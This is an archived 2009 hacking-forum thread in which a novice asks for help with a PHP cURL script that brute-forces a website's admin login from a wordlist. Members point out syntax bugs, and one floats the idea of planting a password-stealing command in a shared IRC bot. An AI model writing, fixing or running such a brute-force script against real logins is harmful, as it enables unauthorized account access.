Zero Identity - General - Programming - What is wrong with this PHP code?

Username: Password: [Forgot Password?] [Not Registered?]

Navigation

Navigation

Challenges

Media

Contribute

ZI Store Updates

Zi Store

Link to UsIf you'd like to become an affilate, please Link to Us!

Online Users

Registered Users: 1394

Latest Registration: nixd

Online Users: 7
(0 Members, 7 Guests)

Poll

If your shout contains ! in the begining, your links will not be clickable.
If you enter the user's full username, it will be highlighted just for that user.Shoutbox

mrdotkommrdotkom

The Smoking gun.

Last Login:
10 year(s) ago
Joined:
04/03/2008 18:51
Experience:
917.83 (03 day(s) ago)

quite the shame my man. Oh well

3l_f3n1x3l_f3n1x

Last Login:
10 year(s) ago
Joined:
08/05/2008 22:56
Experience:
271.15 (03 day(s) ago)

no one knows... Suddenly it was dead... =(

mrdotkommrdotkom

The Smoking gun.

Last Login:
10 year(s) ago
Joined:
04/03/2008 18:51
Experience:
917.83 (03 day(s) ago)

Oh dear. What has happend to my ZI?

[Shoutbox Archive]

Zero Identity Forums - General - Programming - What is wrong with this PHP code?

Are you bored? Check out the unaswered threads!

muesli Member Newbie Joined: 12.07.2009 Last Seen: 10 year(s) ago Experience: 35.8 Points:
	#1 What is wrong with this PHP code? on July 12 2009 22:27
	This is the error I get: " Parse error: parse error, unexpected $end in \192.168.0.16webfilesfiles2009-73140964brute.php on line 41 " Code Highlighting :: Select Code <?php // configure the bruter with your scenario $target = "http://www.darkmindz.com/login.php"; // your target. $user = "admin"; // the user we are bruting $user_field = "user_name"; // the username field name in form $pass_field = "password"; // the password field name in form $bad = "Wrong username or password"; // message if the user / pass was wrong $list = "path_to_word_list"; // the path to your wordlist // Set the time limit of executing the script to 0 - never set_time_limit(0); // star the normal cURL routine $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $target); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_POST, 1); // The actual bruting process foreach(file($list) as $line) { $word = str_replace(array(" ", " "), , $line); $postfields = "".user_field."=".$username."&".$pass_field."=".$word.""; curl_setopt($ch, CURLOPT_POSTFIELDS, $postfields); $res = curl_exec($ch); if(!eregi($bad,$res)) { die("Pass found, it is: {$word}"); // password found } } // close cURL connection curl_close($ch); ?>

3l_f3n1x Member V Fan Professional Analyst Joined: 05.08.2008 Last Seen: 10 year(s) ago Experience: 271.15 Points: 905
	#2 on July 12 2009 22:55
	Ok, I found 1 error and 1 possible error (but I need to run the script to know if that is correct or not)... However I won't tell you where the error(s) is(are) so easily, but first I would like to know if you understand that code... So please tell me: how does this code work? You seem like a nice man and I would like to help you... "Beneath this mask there is more than flesh. Beneath this mask there is an idea, Mr. Creedy, and ideas are bulletproof." - V BTW: My username was elfenix

swiftnomad Administrator Public Relations ZI Guru Joined: 04.04.2008 Last Seen: 02 month(s) ago Experience: 3189.27 Points: 405
	#3 on July 13 2009 00:37
	hehe, there are only 40 lines of code here.. :) Code Highlighting :: Select Code `if (sizeof (problems.txt) > CRITICAL){ exec("> /dev/null"); }` USER: Hello Tech Support? I can't print... ME: Try cursive then <hang up>

pyr0t3chnician Member Too Legit Professional Analyst Joined: 04.01.2009 Last Seen: 10 year(s) ago Experience: 455.88 Points: 545
	#4 on July 13 2009 02:42
	I think maybe this: Code Highlighting :: Select Code `$word = str_replace(array(" ", " "), , $line);` Got an empty space there between ", ,". Could be causing the error. I haven't ran it myself to check tho.

Grindordie Administrator Software Engineer ZI Guru Joined: 04.11.2007 Last Seen: 10 year(s) ago Experience: 1074.3 Points: 1100
	#5 Software Engineer on July 13 2009 19:29
	This looks very familiar to a piece of code I wrote many years ago. Parse error: parse error, unexpected $end Usually means you forgot to close a bracket { } That's not a bug, that's an unexpected feature phpFort - light-weight content management system.

3l_f3n1x Member V Fan Professional Analyst Joined: 05.08.2008 Last Seen: 10 year(s) ago Experience: 271.15 Points: 905
	#6 on July 13 2009 22:09
	I think something is wrong with this line: Code Highlighting :: Select Code `<?php $postfields = "".user_field."=".$username."&".$pass_field."=".$word.""; ?>` "Beneath this mask there is more than flesh. Beneath this mask there is an idea, Mr. Creedy, and ideas are bulletproof." - V BTW: My username was elfenix

muesli Member Newbie Joined: 12.07.2009 Last Seen: 10 year(s) ago Experience: 35.8 Points:
	#7 on July 13 2009 23:57
	well im not gonna lie. i don't know php lol. but i do wanna use the script to brute force. i asked around on some other forums and this is what ive got. Code Highlighting :: Select Code <?php // configure the bruter with your scenario $target = "http://www.example.com/login.php"; // your target. $user = "admin"; // the user we are bruting $user_field = "username"; // the username field name in form $pass_field = "password"; // the password field name in form $bad = "Incorrect Username or Password"; // message if the user / pass was wrong $list = "dictionary.txt"; // the path to your wordlist // star the normal cURL routine $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $target); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); // The actual bruting process foreach(file($list) as $line) { $postfields = $user_field."=".$username."&".$pass_field."=".$line; curl_setopt($ch, CURLOPT_POSTFIELDS, $postfields); $res = curl_exec($ch); if(!eregi($bad,$res)) { die("Pass found, it is: {$word}"); // password found } } // close cURL connection curl_close($ch); ?> it doesn't error now, but it still won't work. it just says: "pass found, it is:" and doesn't even give a pass. has anyone else gotten this to work. thanks for your feedback.

pyr0t3chnician Member Too Legit Professional Analyst Joined: 04.01.2009 Last Seen: 10 year(s) ago Experience: 455.88 Points: 545
	#8 on July 14 2009 01:12
	Quote from 3l_f3n1x I think something is wrong with this line: Code Highlighting :: Select Code `<?php $postfields = "".user_field."=".$username."&".$pass_field."=".$word.""; ?>` GAH! You win. I should have looked a little closer. $$$

3l_f3n1x Member V Fan Professional Analyst Joined: 05.08.2008 Last Seen: 10 year(s) ago Experience: 271.15 Points: 905
	#9 V Fan on July 15 2009 01:12
	Quote from pyr0t3chnician GAH! You win. I should have looked a little closer. $$$ Yes those damn dollar signs xD Quote from muesli it doesn't error now, but it still won't work. it just says: "pass found, it is:" and doesn't even give a pass. has anyone else gotten this to work. thanks for your feedback. muesli, I really suggest you learn PHP if you want to understand the code you posted above... I know PHP and I think I know why you don't get good answers with that script... You shouldn't be using some random scripts if you don't understand them... Imagine you run a script in your computer thinking it will bruteforce something but it ends up deleting every file in your harddisk... That would be pretty bad... In some circles, they would consider you a Script Kiddie... Please don't be a Script Kiddie and try to understand the tool you are using... You will see everything clearer and probably you will change the script to suit your needs... If you want help to understand PHP (or any programming language) then you can pm me with your questions. Of course, this is an advice... I will be pretty proud of you if you take it, but God gave us free will so it is your choice :) "Beneath this mask there is more than flesh. Beneath this mask there is an idea, Mr. Creedy, and ideas are bulletproof." - V BTW: My username was elfenix

pyr0t3chnician Member Too Legit Professional Analyst Joined: 04.01.2009 Last Seen: 10 year(s) ago Experience: 455.88 Points: 545
	#10 on July 15 2009 23:35
	Quote from 3l_f3n1x Imagine you run a script in your computer thinking it will bruteforce something but it ends up deleting every file in your harddisk... That would be pretty bad... I have my IRC bot script/class that I posted, and several people have downloaded it and run it without changing the variables. I will be on #zeroidentity and Pyr0sSampleBot shows up, with all his original commands. I was thinking to put some stuff in there so that when it logs on, I type "!passwords" and it will send/post the firefox passwords or something. People will still run it cause they think they understand it. Sad that I could do that, make it completely obvious, and they will still run it.

3l_f3n1x Member V Fan Professional Analyst Joined: 05.08.2008 Last Seen: 10 year(s) ago Experience: 271.15 Points: 905
	#11 on July 16 2009 01:48
	Quote from pyr0t3chnician I have my IRC bot script/class that I posted, and several people have downloaded it and run it without changing the variables. I will be on #zeroidentity and Pyr0sSampleBot shows up, with all his original commands. I was thinking to put some stuff in there so that when it logs on, I type "!passwords" and it will send/post the firefox passwords or something. People will still run it cause they think they understand it. Sad that I could do that, make it completely obvious, and they will still run it. Sometimes it's funny to see braindead people like script kiddies doing stuff like that, but sometimes (and with that I mean almost everytime) it gets pretty annoying... I mean so much stupidity makes me nauseous xD... "Study without thought is labor lost; thought without study is dangerous." - Confucius "Beneath this mask there is more than flesh. Beneath this mask there is an idea, Mr. Creedy, and ideas are bulletproof." - V BTW: My username was elfenix

muesli Member Newbie Joined: 12.07.2009 Last Seen: 10 year(s) ago Experience: 35.8 Points:
	#12 on July 17 2009 15:55
	ok thanks guys, im trying to learn php my self. this is what ive learned to do so far haha. http://muesli.freehostia.com/test.php

3l_f3n1x Member V Fan Professional Analyst Joined: 05.08.2008 Last Seen: 10 year(s) ago Experience: 271.15 Points: 905
	#13 on July 18 2009 01:37
	Well, I am very glad you choose the right path :) If you have questions about programming, just send me a private message and I will help you to find the answer :) I recommend you to install an apache with the PHP modules if you want to experiment with this language. It will be easier to edit your files and see the results. Also you don't depend on an internet connection to test your php scripts. "Beneath this mask there is more than flesh. Beneath this mask there is an idea, Mr. Creedy, and ideas are bulletproof." - V BTW: My username was elfenix

muesli Member Newbie Joined: 12.07.2009 Last Seen: 10 year(s) ago Experience: 35.8 Points:
	#14 on July 19 2009 00:26
	thanks. im installing xampp now. here's a question. can you do scripts like the brute force one in xampp, even though they communicate with websites?

pyr0t3chnician Member Too Legit Professional Analyst Joined: 04.01.2009 Last Seen: 10 year(s) ago Experience: 455.88 Points: 545
	#15 on July 19 2009 02:42
	You can indeed do everything with xampp (it has apache, php, and mysql), but it may require a bit of configuring, as it may not come with 100% of the modules you want installed... however, for learning purposes, it is perfect. This is just my preference, but I have xampp installed on my computer, I also downloaded php separately to run in cmd.exe. For my web applications, I use xampp. But for brute force type scripts (ones that sit in loops for hours) or simple test scripts that only echo out a few lines of data, I use cmd.exe. For me it is easier to open notepad and type :<?php echo md5("hello"); ?>, click save, open command and type: c:phpphp md5.php . Again it is just preference. I have been working with PHP for quite a few years, like most of us here, and are more than willing to help you out if you get stuck on something.

Who is watching forums

Users viewing this page:	Guests (1)
Users viewing the forum:	0

© 2009 ZeroIdentity.org | Atlanta SEO

Powered by phpFort © 2008
Page generated in 0.080 seconds. :: MySQL Queries: 12